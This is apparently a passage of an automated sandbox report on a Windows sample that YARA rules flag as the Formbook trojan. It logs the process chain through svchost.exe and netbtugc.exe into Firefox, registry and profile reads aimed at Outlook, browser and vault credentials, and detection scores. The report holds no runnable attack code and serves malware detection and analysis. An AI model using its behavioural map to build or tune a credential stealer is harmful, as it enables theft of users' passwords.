Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032BA840	4_2_032BA840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032B2840	4_2_032B2840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032968B8	4_2_032968B8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032DE8F0	4_2_032DE8F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032F2F28	4_2_032F2F28
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032D0F30	4_2_032D0F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03324F40	4_2_03324F40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0332EFA0	4_2_0332EFA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032BCFE0	4_2_032BCFE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032A2FC8	4_2_032A2FC8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0336EE26	4_2_0336EE26
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032B0E59	4_2_032B0E59
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0336CE93	4_2_0336CE93
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032C2E90	4_2_032C2E90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0336EEDB	4_2_0336EEDB
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032BAD00	4_2_032BAD00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0334CD1F	4_2_0334CD1F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032C8DBF	4_2_032C8DBF
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032AADE0	4_2_032AADE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032B0C00	4_2_032B0C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03350CB5	4_2_03350CB5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032A0CF2	4_2_032A0CF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0336132D	4_2_0336132D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0329D34C	4_2_0329D34C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032F739A	4_2_032F739A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032B52A0	4_2_032B52A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033512ED	4_2_033512ED
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032CB2C0	4_2_032CB2C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032E516C	4_2_032E516C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0329F172	4_2_0329F172
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0337B16B	4_2_0337B16B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032BB1B0	4_2_032BB1B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0336F0E0	4_2_0336F0E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033670E9	4_2_033670E9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032B70C0	4_2_032B70C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0335F0CC	4_2_0335F0CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0336F7B0	4_2_0336F7B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_033616CC	4_2_033616CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03367571	4_2_03367571
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0334D5B0	4_2_0334D5B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0336F43F	4_2_0336F43F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032A1460	4_2_032A1460
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0336FB76	4_2_0336FB76
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032CFB80	4_2_032CFB80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03325BF0	4_2_03325BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032EDBF9	4_2_032EDBF9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03323A6C	4_2_03323A6C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03367A46	4_2_03367A46
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0336FA49	4_2_0336FA49
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032F5AA0	4_2_032F5AA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0334DAAC	4_2_0334DAAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0335DAC6	4_2_0335DAC6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03345910	4_2_03345910
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032B9950	4_2_032B9950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032CB950	4_2_032CB950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0331D800	4_2_0331D800
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032B38E0	4_2_032B38E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0336FF09	4_2_0336FF09
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0336FFB1	4_2_0336FFB1
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032B1F92	4_2_032B1F92
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032B9EB0	4_2_032B9EB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03367D73	4_2_03367D73
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032B3D40	4_2_032B3D40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03361D5A	4_2_03361D5A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_032CFDC0	4_2_032CFDC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03329C32	4_2_03329C32
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0336FCF2	4_2_0336FCF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A115E0	4_2_00A115E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A130EE	4_2_00A130EE
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A130F0	4_2_00A130F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A0C7C7	4_2_00A0C7C7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A0C7D0	4_2_00A0C7D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A0C9F0	4_2_00A0C9F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A0AA70	4_2_00A0AA70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00A29FD0	4_2_00A29FD0

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03287E54 appears 101 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03275130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0322B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 032AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 032BF290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 0331EA12 appears 86 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 0329B970 appears 275 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 032F7E54 appears 100 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 0332F290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 032E5130 appears 58 times
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: String function: 00BE8B40 appears 42 times
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: String function: 00BC7F41 appears 35 times
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: String function: 00BE0D27 appears 70 times

Source: 150-425-2024.exe, 00000000.00000003.1442616568.0000000003F53000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 150-425-2024.exe
Source: 150-425-2024.exe, 00000000.00000003.1447380115.000000000414D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 150-425-2024.exe

Source: 150-425-2024.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.600000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.600000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1583707239.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3915191232.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3897905735.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3915118519.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1584717974.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1583886010.0000000002930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.3915054497.0000000003230000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@14/12

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00C2A2D5 GetLastError,FormatMessageW,

0_2_00C2A2D5

Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C18713 AdjustTokenPrivileges,CloseHandle,		0_2_00C18713
Source: C:\Users\user\Desktop\150-425-2024.exe	Code function: 0_2_00C18CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00C18CC3

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00C2B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00C2B59E

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00C3F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00C3F121

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00C386D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00C386D0

Source: C:\Users\user\Desktop\150-425-2024.exe

Code function: 0_2_00BC4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00BC4FE9

Source: C:\Users\user\Desktop\150-425-2024.exe

File created: C:\Users\user\AppData\Local\Temp\aut52A6.tmp

Jump to behavior

Source: 150-425-2024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\150-425-2024.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: netbtugc.exe, 00000004.00000003.1769072522.0000000002C51000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1769072522.0000000002C72000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1768993413.0000000002C87000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1770200109.0000000002CA7000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3910307845.0000000002C72000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1770200109.0000000002C72000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3910307845.0000000002CA7000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 150-425-2024.exe	ReversingLabs: Detection: 47%
Source: 150-425-2024.exe	Virustotal: Detection: 28%

Source: unknown	Process created: C:\Users\user\Desktop\150-425-2024.exe "C:\Users\user\Desktop\150-425-2024.exe"
Source: C:\Users\user\Desktop\150-425-2024.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\150-425-2024.exe"
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\150-425-2024.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\150-425-2024.exe"	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\150-425-2024.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\150-425-2024.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: 150-425-2024.exe

Static file information: File size 1528320 > 1048576

Source: 150-425-2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 150-425-2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 150-425-2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 150-425-2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 150-425-2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 150-425-2024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 150-425-2024.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000000.1505609494.00000000006BE000.00000002.00000001.01000000.00000004.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000000.1655891040.00000000006BE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: 150-425-2024.exe, 00000000.00000003.1447380115.0000000004020000.00000004.00001000.00020000.00000000.sdmp, 150-425-2024.exe, 00000000.00000003.1444736163.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1491506539.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1584116157.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1584116157.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1489430739.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3917880903.000000000340E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3917880903.0000000003270000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1587522806.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1584000279.0000000002F12000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 150-425-2024.exe, 00000000.00000003.1447380115.0000000004020000.00000004.00001000.00020000.00000000.sdmp, 150-425-2024.exe, 00000000.00000003.1444736163.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1491506539.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1584116157.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1584116157.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1489430739.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.3917880903.000000000340E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3917880903.0000000003270000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1587522806.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1584000279.0000000002F12000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1583975523.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1548871766.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000002.3914413395.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3910307845.0000000002BEE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3918311897.000000000389C000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000000.1656364665.0000000002F8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1874354603.000000003887C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3910307845.0000000002BEE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3918311897.000000000389C000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000000.1656364665.0000000002F8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1874354603.000000003887C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1583975523.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1548871766.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000002.3914413395.0000000000B98000.00000004.00000020.00020000.00000000.sdmp

Source: 150-425-2024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 150-425-2024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 150-425-2024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 150-425-2024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 150-425-2024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\150-425-2024.exe

